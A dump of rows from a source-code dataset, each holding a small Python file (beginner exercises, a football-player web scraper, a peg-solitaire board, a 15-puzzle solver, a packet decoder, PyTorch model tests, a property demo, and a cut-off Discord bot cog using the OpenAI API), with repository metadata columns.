seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
12089395343 | """
练习:
在终端中获取一个整数,作为边长,打印矩形。
效果:
请输入整数:5
$$$$$
$ $
$ $
$ $
$$$$$
"""
# number = int(input("请输入数字:"))
# print("$" * number)
# for item in range(number-2):#0 1 2
# print("$%s$" % (" " * (number - 2)))
# print("$" * number)
# Read a side length from the terminal and draw a hollow square of '$'.
number = int(input("请输入数字:"))
full_row = "$" * number
hollow_row = "$%s$" % (" " * (number - 2))
for row_index in range(number):
    # First and last rows are solid; every row in between is hollow.
    is_edge = row_index in (0, number - 1)
    print(full_row if is_edge else hollow_row)
| 15149295552/Code | Month02/day04/exercise03.py | exercise03.py | py | 577 | python | zh | code | 1 | github-code | 13 |
70301768337 | from bs4 import BeautifulSoup
import requests
import json
def get_players(team=None, year=None):
    """Scrape player names from worldfootball.net.

    Dispatch depends on which arguments are given:
      * no team, no year -> {team_id: {year: [player, ...]}} for every team
      * team only        -> {year: [player, ...]} walking back from 2019
      * team and year    -> ([player, ...], success_flag)
      * year only        -> invalid

    Raises:
        ValueError: if a year is given without a team.
    """
    # scrape players across all teams and years
    if team is None and year is None:
        teams = get_team_ids()
        print('Checkpoint: Done getting team ids')
        players = {}
        for team in teams:
            team_players = get_players(team=team)
            players[team] = team_players
            print('Checkpoint: Done getting players from ' + team)
        return players
    # scrape a team's players across all years, newest season first
    elif team is not None and year is None:
        players = {}
        for year in range(2019, 1949, -1):
            player, success = get_players(team, year)
            if not success:
                # The site has no page for this season; stop walking back.
                break
            players[year] = player
            print('Checkpoint: Done getting ' + team + ' players from ' + str(year))
        return players
    # error state: fail loudly instead of *returning* an exception object
    # (the original `return Exception(...)` silently handed callers an
    # Exception instance instead of raising it)
    elif team is None:
        raise ValueError('Cannot specify a year if team is not specified')
    # scrape the players for a particular team and year
    else:
        resp = requests.get('https://www.worldfootball.net/teams/' + team + '/' + str(year) + '/2/')
        if resp.status_code != 200:
            return [], False
        html = BeautifulSoup(resp.content, 'html.parser')
        positions = ['Goalkeeper', 'Midfielder', 'Defender', 'Forward']
        player_table = None
        for table in html.find_all(class_='standard_tabelle'):
            # The squad table is the one that mentions player positions.
            if len(table.find_all(string=positions)) > 0:
                player_table = table
                break
        if player_table is None:
            # Page exists but holds no squad table: treat as an empty season.
            return [], True
        player = []
        for tr in player_table.find_all('tr'):
            if len(tr.find_all(string=['Coach', 'Manager'])) > 0:
                # Staff rows follow the squad; stop before them.
                break
            cells = tr.find_all('td')
            if len(cells) == 0:
                continue  # header/separator row
            player.append(cells[2].string)
        return player, True
def get_team_ids():
    """Collect team identifiers from the 2018/19 league squad pages.

    Covers the top two leagues in England, Italy, Germany and Spain plus
    the top league in France and the Netherlands.
    """
    league_urls = [
        'https://www.worldfootball.net/players/eng-premier-league-2018-2019/',
        'https://www.worldfootball.net/players/eng-championship-2018-2019/',
        'https://www.worldfootball.net/players/bundesliga-2018-2019/',
        'https://www.worldfootball.net/players/2-bundesliga-2018-2019/',
        'https://www.worldfootball.net/players/fra-ligue-1-2018-2019/',
        'https://www.worldfootball.net/players/ita-serie-a-2018-2019/',
        'https://www.worldfootball.net/players/ita-serie-b-2018-2019/',
        'https://www.worldfootball.net/players/esp-primera-division-2018-2019/',
        'https://www.worldfootball.net/players/esp-segunda-division-2018-2019/',
        'https://www.worldfootball.net/players/ned-eredivisie-2018-2019/'
    ]
    team_ids = []
    for league_url in league_urls:
        page = BeautifulSoup(requests.get(league_url).content, 'html.parser')
        # The team-overview table is the one mentioning player/match counts.
        teams_table = next(
            (t for t in page.find_all(class_='standard_tabelle')
             if len(t.find_all(string=['player', 'Matches'])) > 0),
            None,
        )
        for row in teams_table.find_all('tr'):
            team_href = row.find_all('td')[1].a['href']
            # Hrefs look like /teams/<team-id>/..., so index 2 is the id.
            team_ids.append(team_href.split('/')[2])
    return team_ids
# Entry point: scrape everything and persist the result as JSON.
players = get_players()
with open('players.json', 'w') as f:
    json.dump(players, f)
| JohnAmadeo/football-networks | scraper_sync.py | scraper_sync.py | py | 3,514 | python | en | code | 0 | github-code | 13 |
21293502029 | # въвеждане на чисто от конзолата
# пресмятане на бонуса според услвията
# добавяне на допълнителен бонус
# принтиране на бонус точките
# принтиране на общия брой точки
# Read the points total and compute the bonus (rules in the comments above).
number = int(input())
# Base bonus depends on the size of the total.
if number > 1000:
    bonus = number * 0.10
elif number > 100:
    bonus = number * 0.20
else:
    bonus = 5
# Extra bonus: +1 for even totals, otherwise +2 when the total ends in 5.
if number % 2 == 0:
    bonus += 1
elif number % 10 == 5:
    bonus += 2
print(bonus)
print(number + bonus) | SJeliazkova/SoftUni | Programming-Basic-Python/Exercises-and-Labs/Conditional_Statements_Exercise/02.Bonus_Score.py | 02.Bonus_Score.py | py | 576 | python | bg | code | 0 | github-code | 13 |
31887144463 | '''
Created on Oct 28, 2018
@author: cmins
'''
# Every coordinates of first value is rows and second value is col
import psexceptions
import psgamestate
class PSBoard:
    def __init__(self):
        # Start with the standard 7x7 cross-shaped peg-solitaire board.
        self._board = self.getNewBoard(7, 7)
        # Joowon Jan,04,2019
        # Cache the board dimensions (default 7x7) as attributes so a
        # future board-resizing feature can change them in one place.
        self.numOfCols = 7
        self.numOfRows = 7
        # end
def getNewBoard(self, rows: int, cols: int) -> [[int]]:
''' Creates a new game board with specified rows and columns '''
board = []
boundindex = (rows - 3) / 2
for r in range(rows):
row = []
for c in range(cols):
if r < boundindex or r > (rows - boundindex - 1):
if c < boundindex or c > (cols - boundindex - 1):
row.append(-1)
continue
row.append(1) # fill with 1
board.append(row)
board[int(rows/2)][int(cols/2)] = 0 # center empty
return board
    def getBoard(self) -> [[int]]:
        ''' Returns the 2D board list (a live reference, not a copy). '''
        return self._board
    def get(self, row: int, col: int) -> int:
        ''' Returns value of peg at coordinate (-1, 0 or 1). '''
        if self.isOutOfBounds(row, col):
            raise psexceptions.PSOutOfBoundsException()
        return self._board[row][col]
    def addPeg(self, row: int, col: int) -> None:
        ''' Place a peg (1) at the given coordinate. '''
        self._board[row][col] = 1
    def removePeg(self, row: int, col: int) -> None:
        ''' Empty the given coordinate (0 = hole). '''
        self._board[row][col] = 0
    def getRows(self) -> int:
        ''' Returns number of rows of board '''
        # return len(self._board)
        # Joowon Jan,04,2019
        # This should return exact value of length
        # I changed it to return variable
        return self.numOfRows
        # end
    def getCols(self) -> int:
        ''' Returns number of cols of board '''
        # return len(self._board[0])
        # Joowon Jan,04,2019
        # return len(self._board)
        # This should return exact value of length
        # I changed it to return variable
        return self.numOfCols
        # end
    # Chan Woo, Jan, 23 moved coordinate calculation functions from psgamestate to psboard
    def calcPegMiddle(self, fromRow: int, fromCol: int, toRow: int, toCol: int) -> ():
        ''' Return the (row, col) of the peg jumped over when moving along a
        row or column. Assumes a two-cell jump -- TODO confirm with callers.
        NOTE(review): diagonal input falls through to the `pass` placeholder
        below and returns None; the comment says it was meant to raise.
        '''
        if fromRow - toRow > 0 and fromCol - toCol == 0:
            return (fromRow - 1, fromCol)
        elif fromRow - toRow < 0 and fromCol - toCol == 0:
            return (fromRow + 1, fromCol)
        elif fromCol - toCol > 0 and fromRow - toRow == 0:
            return (fromRow, fromCol - 1)
        elif fromCol - toCol < 0 and fromRow - toRow == 0:
            return (fromRow, fromCol + 1)
        else:
            pass # throwexcemption
    def isDiagonal(self, fromcol: int, fromrow: int, tocol: int, torow: int) -> bool:
        ''' NOTE(review): despite the name, this returns True for an
        axis-aligned (purely horizontal/vertical) move and False for a
        diagonal one. Callers may rely on the inverted meaning, so it is
        documented here rather than changed. '''
        if (fromcol - tocol) != 0 and (fromrow - torow) != 0:
            return False
        return True
def isOutOfBounds(self, row: int, col: int) -> bool:
''' Checks if location is in board '''
if row < 0 or row > self.getRows():
return True
if col < 0 or col > self.getCols():
return True
# TODO: check for corners
    def printBoard(self) -> None:
        ''' Display the board on the console. '''
        # Unusable corner cells (-1) print as 'x'; pegs/holes print as 1/0.
        for r in range(self.getRows()):
            for c in range(self.getCols()):
                if self.get(r,c) == -1:
                    print('x', end=' ')
                else:
                    print(self.get(r, c), end=' ')
            print('\n') | ChanwO-o/peg-solitaire | psboard.py | psboard.py | py | 3,800 | python | en | code | 1 | github-code | 13 |
21931887455 | import map,pygame,random
from pygame.locals import *
class CrtPlayer:
    # Player state: HP, FOOD, SLEEP, SKILL, FOODSPEED, SLEEPSPEED, PLAYERX, PLAYERY, MAP
    def __init__(self,Maps,Scr,Font):
        """Create a fresh player: default stats, random starting map, save
        files on disk, then show the randomly-assigned role's intro text."""
        self.HP=100
        self.Food=1000
        self.Sleep=2000
        self.FoodSpeed=2
        self.SleepSpeed=2
        self.PlayerX=0
        self.PlayerY=0
        self.PassTimes=0
        self.Day=0
        self.Map="None"
        self.Dir=0 #0Up 1Next 2Now
        self.Item=["测试1","测试2"]
        self.Scr=Scr
        self.Font=Font
        # Pick a starting map at random.
        N=len(Maps)-1
        C=random.randint(0,N)
        self.Map=Maps[C]
        # Persist the initial stats to the save file.
        File=open("data/save/player.scpe","w+")
        File.writelines(str(self.HP)+"\n")
        File.writelines(str(self.Food) + "\n")
        File.writelines(str(self.Sleep) + "\n")
        File.writelines(str(self.FoodSpeed) + "\n")
        File.writelines(str(self.SleepSpeed) + "\n")
        File.writelines(str(self.PlayerX) + "\n")
        File.writelines(str(self.PlayerY) + "\n")
        File.writelines(str(self.Map) + "\n")
        File.close()
        # Create (truncate) the item save file.
        File=open("data/save/playeritem.scpe","w+")
        File.close()
        self.ManC()
        self.ReadPlayer()
        print("玩家创建完毕。")
def ManC(self):
R=random.randint(1,4)
if R==1:
self.Man="D级人员"
elif R==2:
self.Man="科研人员"
elif R==3:
self.Man="安保人员"
elif R==4:
self.Man="清洁工"
    def ReadPlayer(self):
        """Render the role's intro text from data/text/<role>.txt, plus a
        'loading...' line, onto the screen."""
        self.Scr.fill((0,0,0))
        # Read the role description file.
        # NOTE(review): the file handle is never closed -- consider `with open(...)`.
        File=open("data/text/"+self.Man+".txt","r",encoding="UTF-8")
        Text=File.readlines()
        TextX=300
        TextY=200
        j=0
        for i in Text:
            ReadText=self.Font.render(i.strip(),True,(255,255,255))
            self.Scr.blit(ReadText,(TextX,TextY+j*30))
            j+=1
        ReadText=self.Font.render("载入中...",True,(255,255,255))
        self.Scr.blit(ReadText, (TextX, TextY + (j+1) * 30))
        pygame.display.update()
    def GetPlayerXY(self,MapName,Map_Exits,OutFromNowMap,BeforeDoorXY):  # OutFromNowMap: 0 = outside NowMap, 1 = inside NowMap
        """Place the player just beside a map exit after a map transition.

        The offset applied depends on the map family ("F-1"/"F-2"/"F-3" in
        MapName) and on self.Dir (0 = upper exit, 1 = lower exit).
        Assumes Map_Exits holds at least two [x, y] pairs -- TODO confirm.
        """
        if OutFromNowMap==0:
            if "F-1" in MapName:
                if self.Dir==0:
                    ExitXY=Map_Exits[0]
                    self.PlayerX=ExitXY[0]
                    self.PlayerY=ExitXY[1]+1
                elif self.Dir==1:
                    ExitXY = Map_Exits[1]
                    self.PlayerX = ExitXY[0]
                    self.PlayerY = ExitXY[1] - 1
            elif "F-2" in MapName:
                if self.Dir == 0:
                    ExitXY = Map_Exits[0]
                    self.PlayerX = ExitXY[0]-1
                    self.PlayerY = ExitXY[1]
                elif self.Dir == 1:
                    ExitXY = Map_Exits[1]
                    self.PlayerX = ExitXY[0]
                    self.PlayerY = ExitXY[1]-1
            elif "F-3" in MapName:
                if self.Dir == 0:
                    ExitXY = Map_Exits[0]
                    self.PlayerX = ExitXY[0]+1
                    self.PlayerY = ExitXY[1]
                elif self.Dir == 1:
                    ExitXY = Map_Exits[1]
                    self.PlayerX = ExitXY[0]
                    self.PlayerY = ExitXY[1]-1
            else:
                # Unknown map family: fall back to a fixed spawn point.
                self.PlayerX=1
                self.PlayerY=4
        else:
            # Re-entering from inside: stand beside the door we came through.
            if "F-2" in MapName:
                self.PlayerX=BeforeDoorXY[0]-1
                self.PlayerY=BeforeDoorXY[1]
            elif "F-3" in MapName:
                self.PlayerX=BeforeDoorXY[0]+1
                self.PlayerY=BeforeDoorXY[1]
def PlayerMove(self,Dir,MapName,Map_Exits):
global AimX,AimY
if Dir=="UP":
AimY=self.PlayerY-1
AimX=self.PlayerX
elif Dir=="DOWN":
AimY = self.PlayerY + 1
AimX = self.PlayerX
elif Dir=="R":
AimY = self.PlayerY
AimX = self.PlayerX+1
elif Dir=="L":
AimY=self.PlayerY
AimX=self.PlayerX-1
#检测是否合法
Data=str(MapName).split("^")
File=open("data/mapdata/maps/"+Data[0]+".map","r")
Map=File.readlines()
Ojb=Map[AimY][AimX]
if Ojb=="W":
return 1#禁止通行
elif Ojb=="N":
self.PlayerX=AimX
self.PlayerY=AimY
return 0#可以通行
elif Ojb=="D":
#判断是那出口
A = [AimX, AimY]
if A in Map_Exits[0]:
self.Dir=1
else:
self.Dir=0
return 2
elif Ojb=="M":
return 3
elif Ojb=="O":
return 4
    def OpenBackage(self):
        """Draw the backpack panel and block until TAB closes it; number
        keys 0-4 use the corresponding item slot."""
        pygame.draw.rect(self.Scr,(0,0,0),((300,400),(300,400)))
        # Show the capacity header (current/5).
        Much=len(self.Item)
        MuchText=self.Font.render(str(Much)+"/5 背包:",True,(255,255,255))
        self.Scr.blit(MuchText,(300,400))
        i=0
        TextX=300
        TextY=400
        for Text in self.Item:
            ItemText=self.Font.render("["+str(i)+"]"+Text,True,(255,255,255))
            self.Scr.blit(ItemText,(TextX,TextY+i*32+32))
            i+=1
        pygame.display.update()
        # NOTE(review): this modal loop only exits on TAB; pygame.QUIT events
        # are ignored here -- confirm whether the window can still be closed.
        OpenBackage=True
        while OpenBackage:
            for event in pygame.event.get():
                if event.type==KEYDOWN:
                    if event.key==K_TAB:
                        return
                    if event.key==K_0:
                        self.UseItem(0)
                    if event.key==K_1:
                        self.UseItem(1)
                    if event.key==K_2:
                        self.UseItem(2)
                    if event.key == K_3:
                        self.UseItem(3)
                    if event.key==K_4:
                        self.UseItem(4)
    def UseItem(self,Which):
        # Placeholder: item effects are not implemented yet.
        pass
    def PrintPlayerData(self):
        """Render the HUD: HP, food, sleep, tick counter, day and location."""
        HPText=self.Font.render("HP:"+str(self.HP),True,(255,255,255))
        FoodText=self.Font.render("FOOD:"+str(self.Food),True,(255,255,255))
        SleepText=self.Font.render("SLEEP:"+str(self.Sleep),True,(255,255,255))
        TimeText=self.Font.render("时间:"+str(self.PassTimes),True,(255,255,255))
        DayText=self.Font.render("Day:"+str(self.Day),True,(255,255,255))
        # Extract the display name from the map id ("<file>#<label>" format
        # presumably -- confirm against map data).
        Data=str(self.Map).split("#")
        Pos=Data[1]
        PosText=self.Font.render("位置:"+str(Pos),True,(255,255,255))
        # Blit all HUD lines down the right-hand side.
        self.Scr.blit(HPText,(700,100))
        self.Scr.blit(FoodText, (700, 150))
        self.Scr.blit(SleepText, (700, 200))
        self.Scr.blit(TimeText, (700, 250))
        self.Scr.blit(DayText, (700, 300))
        self.Scr.blit(PosText, (700,350))
        pygame.display.update()
def PlayerSpend(self):
self.Food-=self.FoodSpeed
self.Sleep-=self.SleepSpeed
self.PassTimes+=1
if self.PassTimes>=500:
self.Day+=1
self.PassTimes=0
    # Death / end-of-game checks
    def CheckNumber(self):
        # Starvation or zero HP kills the player. NOTE(review): Sleep is not
        # checked here -- presumably handled elsewhere; confirm.
        if self.Food<=0 or self.HP<=0:
            self.PlayerDead()
        elif self.Day==7:
            print("游戏结束。")
    def PlayerDead(self):
        # Currently only logs the death to the console.
        print("玩家死亡.") | henda233/SCP-E | player.py | player.py | py | 7,486 | python | en | code | 0 | github-code | 13 |
class Move_16:
    """Swap the blank tile (16) one step on a shared grid.

    The grid (lst1) and the blank's position (yx) are taken from *other*;
    my/mx are the row/column offsets of the swap target.
    """
    def __init__(self,other,my,mx):
        self.lst1 = other.lst1
        self.yx = other.yx
        self.my = my
        self.mx = mx
    def move__1(self):
        row, col = self.yx
        target_row = row + self.my
        target_col = col + self.mx
        grid = self.lst1
        # Exchange the blank with the neighbouring tile in place.
        grid[row][col], grid[target_row][target_col] = (
            grid[target_row][target_col],
            grid[row][col],
        )
        # NOTE: self.yx is deliberately left unchanged (as in the original).
        print('\n\n\n')
        print(self.lst1)
class Lst:
    """15-puzzle board wrapper.

    On construction it locates the blank tile (16), parks it in the
    bottom-right corner, then records where tile *x* currently is (jk)
    and where it belongs in the solved layout lst2 (lm).
    """
    # Direction -> [row offset, col offset] for moving the blank.
    dic1 = {'u': [-1, 0], 'd': [1, 0], 'r': [0, 1], 'l': [0, -1]}
    # The solved reference layout.
    lst2 = [[1, 2, 3, 4],
            [5, 6, 7, 8],
            [9, 10, 11, 12],
            [13, 14, 15, 16]]
    def __init__(self,lst1,x):
        self.lst1 = lst1
        self.x = x
        # Find the blank (16) on the scrambled board.
        for i in range(4):
            for j in range(4):
                if 16 == lst1[i][j]:
                    self.yx = [i, j]
        # Walk the blank to the bottom-right corner (3, 3).
        mj, mk = 3-self.yx[0],3-self.yx[1]
        for movey in range(abs(mj)):
            if mj > 0:
                self.move_16(1, 0)  # blank moves down one row
            else:
                self.move_16(-1, 0)  # blank moves up one row
        for movex in range(abs(mk)):
            if mk < 0:
                self.move_16(0, -1)  # blank moves left one column
            else:
                self.move_16(0, 1)  # blank moves right one column
        # Current position of tile x...
        for i in range(4):
            for j in range(4):
                if x == lst1[i][j]:
                    self.jk = [i, j]
        # ...and its target position in the solved layout.
        for i in range(4):
            for j in range(4):
                if x == Lst.lst2[i][j]:
                    self.lm = [i, j]
    def move_16(self,my,mx):
        # Swap the blank with its (my, mx) neighbour and track its position.
        y, x = self.yx
        self.lst1[y][x], self.lst1[y + my][x + mx] = self.lst1[y + my][x + mx], self.lst1[y][x]
        self.yx = [y+my,x+mx]
        print(self.lst1)
        return self
class Alloction:
    """Dispatch a puzzle tile to the handler that places it.

    (Class name kept as-is for compatibility; 'Allocation' was intended.)
    """
    def __init__(self,lst1):
        self.lst1 = lst1
    def allocation(self):
        """Route self.lst1.x to its Move* handler.

        Fix: tiles 11 and 12 previously fell through to Move10 (a
        copy-paste bug -- Move11/Move12 existed but were never used).
        """
        x = self.lst1.x
        if x in [1,5,9]:
            Move159(self.lst1).do()
        elif x in [2,3,6,7]:
            Move2367(self.lst1).do()
        elif x in [4,8]:
            return Move48(self.lst1).do()
        elif x == 10:
            return Move10(self.lst1).do()
        elif x == 11:
            return Move11(self.lst1).do()
        elif x == 12:
            return Move12(self.lst1).do()
        else:
            return MoveFinl(self.lst1).do()
class Move159():
    # Handler for tiles 1, 5 and 9.
    def __init__(self,other):
        self.other = other
    def do(self):
        if self.other.lm == self.other.jk:
            # Tile already sits on its target square: report and stop.
            print(self.other.yx,self.other.lm)
            print('{0}已还原'.format(self.other.x))
        else:
            # Otherwise apply a fixed up/up/left blank walk and signal work done.
            ls = ['u','u','l']
            for i in ls:
                self.other.move_16(Lst.dic1[i][0],Lst.dic1[i][1])
            return 1
class Move2367():
    """Handler for tiles 2, 3, 6 and 7 (currently only reports completion)."""
    def __init__(self, other):
        self.other = other
    def do(self):
        # Nothing to do unless the tile already sits on its target square.
        if self.other.lm != self.other.jk:
            return
        print('{0}已还原'.format(self.other.x))
class Move48():
    """Handler for tiles 4 and 8 (currently only reports completion)."""
    def __init__(self, other):
        self.other = other
    def do(self):
        if self.other.lm != self.other.jk:
            return
        print('{0}已还原'.format(self.other.x))
class Move10():
    """Handler for tile 10 (currently only reports completion)."""
    def __init__(self, other):
        self.other = other
    def do(self):
        if self.other.lm != self.other.jk:
            return
        print('{0}已还原'.format(self.other.x))
class Move11():
    """Handler for tile 11 (currently only reports completion)."""
    def __init__(self, other):
        self.other = other
    def do(self):
        if self.other.lm != self.other.jk:
            return
        print('{0}已还原'.format(self.other.x))
class Move12():
    """Handler for tile 12 (currently only reports completion)."""
    def __init__(self, other):
        self.other = other
    def do(self):
        if self.other.lm != self.other.jk:
            return
        print('{0}已还原'.format(self.other.x))
class MoveFinl():
    """Handler for the final tiles (currently only reports completion)."""
    def __init__(self, other):
        self.other = other
    def do(self):
        if self.other.lm != self.other.jk:
            return
        print('{0}已还原'.format(self.other.x))
# Drive the solver: try to place tiles 1..13 in order on a scrambled board.
for i in range(1,14):
    ll = Lst([[16,1,3,4],[8,7,6,5],[12,11,10,9],[13,15,2,14]],i)
    llst = Alloction(ll)
    llst.allocation()
break | initialencounter/code | Python/游戏/华容道/15rewrite.py | 15rewrite.py | py | 3,918 | python | en | code | 0 | github-code | 13 |
31299037728 | from abc import ABC, abstractmethod
import numpy as np
# Default to an example packet, then overwrite with the real puzzle input.
input_str = '9C0141080250320F1802104A08'
with open('input', 'r') as f:
    input_str = f.read()
input_str = input_str.strip()
print(input_str)
class Packet(ABC):
    """Base class for decoded bit-stream packets."""
    def __init__(self, type_id, version):
        self.type = type_id
        self.version = version
        # Type 4 packets carry a literal value; all others are operators.
        self.is_literal = self.type == 4
    def get_type(self):
        """Human-readable packet kind."""
        return 'Literal' if self.is_literal else 'Operator'
    def decode_header(self, stream):
        """Split a header: 3-bit version, 3-bit type id, rest of stream."""
        version = int(stream[:3], 2)
        type_id = int(stream[3:6], 2)
        return version, type_id, stream[6:]
    @abstractmethod
    def version_sum(self):
        """Sum of this packet's version and all sub-packet versions."""
        pass
    @abstractmethod
    def decode(self, stream):
        """Consume this packet's payload from *stream*."""
        pass
    @abstractmethod
    def __str__(self):
        pass
    @abstractmethod
    def get_value(self):
        """Evaluate the packet to an integer."""
        pass
class LiteralPacket(Packet):
    """Packet that encodes a single literal integer (type id 4)."""
    def __init__(self, type_id, version):
        super().__init__(type_id, version)
        self.value = None
    def decode(self, stream):
        """Consume 5-bit groups; return (value, remaining stream)."""
        bits = []
        more = True
        while more:
            # The first bit of each group flags whether another group follows.
            more = stream[0] == '1'
            bits.append(stream[1:5])
            stream = stream[5:]
        self.value = int(''.join(bits), 2)
        return self.value, stream
    def version_sum(self):
        # A literal has no sub-packets.
        return self.version
    def get_value(self):
        return self.value
    def __str__(self):
        return f'{self.get_type()} (ver {self.version}): [value: {self.value}]'
    def __repr__(self):
        return self.__str__()
class OperatorPacket(Packet):
    """Packet that applies an operation (by type id) to its sub-packets."""
    def __init__(self, type_id, version):
        super().__init__(type_id, version)
        self.subpackets = []
    def decode_payload(self, stream):
        # Decode exactly one sub-packet from the front of the stream.
        version, type_id, stream = self.decode_header(stream)
        if type_id == 4:
            packet = LiteralPacket(type_id, version)
            _, stream = packet.decode(stream)
            self.subpackets.append(packet)
        else:
            packet = OperatorPacket(type_id, version)
            _, stream = packet.decode(stream)
            self.subpackets.append(packet)
        return stream
    def decode(self, stream):
        # Length-type bit 1: next 11 bits = number of sub-packets.
        # Length-type bit 0: next 15 bits = payload length in bits.
        length_type = int(stream[0])
        length_type = 11 if length_type == 1 else 15
        length = int(stream[1:length_type+1], 2)
        stream = stream[length_type+1:]
        if length_type == 15:
            payload = stream[:length]
            while payload:
                payload = self.decode_payload(payload)
            stream = stream[length:]
        else:
            for i in range(length):
                stream = self.decode_payload(stream)
        return self, stream
    def version_sum(self):
        return self.version + sum([x.version_sum() for x in self.subpackets])
    def get_value(self):
        # NOTE(review): np.product is deprecated in newer NumPy; np.prod is
        # the modern spelling.
        if self.type == 0: # sum
            return np.sum([x.get_value() for x in self.subpackets])
        elif self.type == 1: # product
            return np.product([x.get_value() for x in self.subpackets])
        elif self.type == 2: # min
            return np.min([x.get_value() for x in self.subpackets])
        elif self.type == 3: # max
            return np.max([x.get_value() for x in self.subpackets])
        elif self.type == 5: # greater than (comment fixed: the code compares with >)
            assert len(self.subpackets) == 2, 'Too many subpackets for >!'
            return int(self.subpackets[0].get_value() >
                       self.subpackets[1].get_value())
        elif self.type == 6: # less than (comment fixed: the code compares with <)
            assert len(self.subpackets) == 2, 'Too many subpackets for <!'
            return int(self.subpackets[0].get_value() <
                       self.subpackets[1].get_value())
        elif self.type == 7: # equals
            assert len(self.subpackets) == 2, 'Too many subpackets for ==!'
            return int(self.subpackets[0].get_value() ==
                       self.subpackets[1].get_value())
        else:
            raise NotImplementedError(f'{self.type} is not a valid operator!')
    def __str__(self):
        out = (
            f'{self.get_type()} (ver {self.version}): ' +
            f'[subpackets: {[str(x) for x in self.subpackets]}]')
        return out
    def __repr__(self) -> str:
        return self.__str__()
def decode_header(stream):
    """Split a packet header: returns (version, type_id, rest_of_stream).

    Module-level twin of Packet.decode_header, used to bootstrap decoding.
    """
    header_bits, rest = stream[:6], stream[6:]
    version = int(header_bits[:3], 2)
    type_id = int(header_bits[3:6], 2)
    return version, type_id, rest
def decode_packet(input_str):
    """Decode a hex string into its outermost packet.

    Returns (packet, leftover_bits).
    """
    # Expand every hex digit into its 4-bit binary form.
    bit_stream = ''.join(format(int(ch, 16), '04b') for ch in input_str)
    version, type_id, bit_stream = decode_header(bit_stream)
    # Type 4 is a literal; every other id is an operator with sub-packets.
    packet_cls = LiteralPacket if type_id == 4 else OperatorPacket
    packet = packet_cls(type_id, version)
    _, bit_stream = packet.decode(bit_stream)
    return packet, bit_stream
packet, stream = decode_packet(input_str)
# NOTE(review): the author's note said "something goes wrong here"; the
# debug prints below were disabled while investigating -- str() on deep
# packet trees recurses through every sub-packet, which may be the issue.
# print(packet)
# print(stream)
print(f'Version sum: {packet.version_sum()}')
print(f'Stream value: {packet.get_value()}')
| speug/AdventOfCode2021 | day16/packet_decoder.py | packet_decoder.py | py | 5,003 | python | en | code | 0 | github-code | 13 |
29123887596 | """Test calling `FCNet` with different input and output features."""
import pytest
from torch import rand # pylint: disable=no-name-in-module
from torch_tools import FCNet
def test_model_with_correct_input_features():
    """Test the model works with different input features."""
    # Default model (input batchnorm and dropout enabled).
    default_model = FCNet(10, 2, hidden_sizes=(5, 5, 5))
    _ = default_model(rand(2, 10))
    # Model with input batchnorm and dropout disabled.
    plain_model = FCNet(
        20,
        2,
        hidden_sizes=(5, 5, 5),
        input_bnorm=False,
        input_dropout=0.0,
    )
    _ = plain_model(rand(2, 20))
def test_model_with_incorrect_input_features():
    """Test the model breaks when using the wrong number of input features."""
    configs = (
        {},  # input batchnorm and dropout enabled (defaults)
        {"input_bnorm": False, "input_dropout": 0.0},  # both disabled
    )
    for extra_kwargs in configs:
        model = FCNet(10, 2, hidden_sizes=(5, 5, 5), **extra_kwargs)
        # Feeding 20 features into a 10-feature model must fail.
        with pytest.raises(RuntimeError):
            _ = model(rand(2, 20))
def test_number_of_output_features_is_correct():
    """Test the model produces the correct number of output features."""
    for out_feats in (2, 128):
        model = FCNet(10, out_feats, hidden_sizes=(5, 5, 5))
        assert model(rand(2, 10)).shape == (2, out_feats)
| jdenholm/TorchTools | tests/models/test_fc_net_call.py | test_fc_net_call.py | py | 1,456 | python | en | code | 4 | github-code | 13 |
12416625769 | # we will write a 'Person' class
class Person(object):  # explicit inheritance from object (implicit in Python 3)
    '''Encapsulates a name, age and email for a person.

    Invalid values are replaced with safe defaults rather than raising:
    non-string or empty names become 'default'; non-positive or
    non-integer ages become 42.
    '''
    def __init__(self, n, a, e):
        # These assignments go through the property setters below, so the
        # validation logic also runs during construction.
        self.name = n
        self.age = a
        self.email = e
    @property  # getter
    def name(self):
        '''The person's display name (validated on assignment).'''
        return self.__name
    @name.setter
    def name(self, new_name):  # setter
        # isinstance also accepts str subclasses, unlike type() == str.
        if isinstance(new_name, str) and new_name != '':
            self.__name = new_name
        else:
            self.__name = 'default'
    @property
    def age(self):
        '''The person's age in years; invalid input falls back to 42.'''
        return self.__age
    @age.setter
    def age(self, newAge):
        # Exclude bool explicitly: isinstance(True, int) is True, but a
        # boolean is not a valid age (matches the original type() check).
        if isinstance(newAge, int) and not isinstance(newAge, bool) and newAge > 0:
            self.__age = newAge
        else:
            self.__age = 42
    # we can override Python built-ins
    def __str__(self):
        # Called by print() and str().
        return (f'{self.__name} is {self.__age} years old')
if __name__ == '__main__':
    p = Person('Ada', -98, 'ada@babbage.ie')
    print(f'Name: {p.name} Age: {p.age}')
    # print('Name: {0} Age: {1}'.format(p.name, p.age))
    # we CANNOT access the mangled private attribute of this class
    # print(p.__name)
    # but be careful:
    p.__name='oops' # this adds a NEW arbitrary attribute to p; name mangling means it does NOT touch _Person__name
    print(p.__name, p.name)
    print(p) # this calls the __str__ method
| onionmccabbage/pythonFeb2023 | using_classes/b.py | b.py | py | 1,589 | python | en | code | 0 | github-code | 13 |
25147857772 | import nextcord
from nextcord.ext import commands
from nextcord import Interaction
import asyncio
from helpers.logger import logger
import openai
import os
class AI(commands.Cog):
    """Discord cog exposing OpenAI-backed slash commands."""
    def __init__(self, bot) -> None:
        # The API key is read from the environment at cog creation time.
        openai.api_key = os.getenv("OPENAI_API_KEY")
        self.bot = bot
    @nextcord.slash_command(name="gpt", description="Ask Bill a question!")
    async def gpt(self, interaction: Interaction, prompt: str):
        """Ask OpenAI's completion API a question and post the answer as an embed."""
        # NOTE(review): unlike image(), this handler has no dedicated
        # OpenAIError branch and the broad except only logs -- the user
        # gets no reply on failure. Confirm whether that is intended.
        try:
            logger.debug(f"Question from user id {interaction.user.id}: {prompt}")
            await interaction.response.defer()
            embed = nextcord.Embed(title=f"Pergunta de {interaction.user.display_name}", description=prompt)
            response = openai.Completion.create(
                model="text-davinci-003",
                prompt=prompt,
                temperature=0.9,
                max_tokens=300,
                frequency_penalty=0.0,
                presence_penalty=0.6
            )
